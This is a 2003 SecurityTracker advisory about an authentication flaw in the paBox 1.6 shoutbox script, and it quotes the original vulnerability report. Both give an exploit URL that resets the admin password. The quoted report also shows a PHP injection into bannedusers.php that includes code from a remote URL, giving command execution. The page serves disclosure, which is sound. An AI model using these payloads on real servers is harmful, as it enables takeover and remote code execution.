SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paBox Vendors:   PHP Arena
paBox Authentication Flaw Lets Remote Users Gain Administrative Access and Execute Arbitrary Commands
SecurityTracker Alert ID:  1007084
SecurityTracker URL:  http://securitytracker.com/id/1007084
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 29 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.6
Description:   Silent Scripter reported an authentication vulnerability in the paBox shoutbox/tagboard script. A remote user can reset the administrator's password to an arbitrary value.

It is reported that a remote user can reset the administrator's username and password to arbitrary values due to an authentication flaw in the 'admin.php' script. Then, the remote user can gain administrative access to the application.

A demonstration exploit URL is provided:

http://localhost/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin

With administrative access to the Control Panel, the remote user can inject arbitrary PHP code (including operating system commands) into the 'bannedusers.php' file and then call the file to execute the commands. The commands will run with the privileges of the web server.

Impact:   A remote user can set the administrator's password to an arbitrary value to gain administrative access to the application. With administrative access to the application, the remote user can execute arbitrary shell commands on the target server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pabox (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in paBox



paBox V1.6
Reset admin password and execute remote code

Informations :
Language : PHP
Version : 1.6
Website : http://www.phparena.net/pabox
Describe : paBox is a PHP/mySQL shoutbox script. You can add it to your site
and visitors can post new messages, it is sort of like a guestbook.

Exploit :
Visitor can reset the Administrator's username and password to anything he's
want and after that, login into the Admin Control Panel on admin.php by this
URL :
http://localhost/thebox/admin.php?act=write&username=admin&password=admin&ad
user=admin&adpass=admin

After loging into the Control Panel, visitor can write any remote code to
the file bannedusers.php (usualy blank) and use this file to execute remote
code, for example, adding <? require ($file); ?> to bannedusers.php and run
http://localhost/thebox/bannedusers.php?file=http://website.com/badcode.php
will execute like a include() hole.

Path:
Remove code when write to file bannedusers.php.

Silent Scripter




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC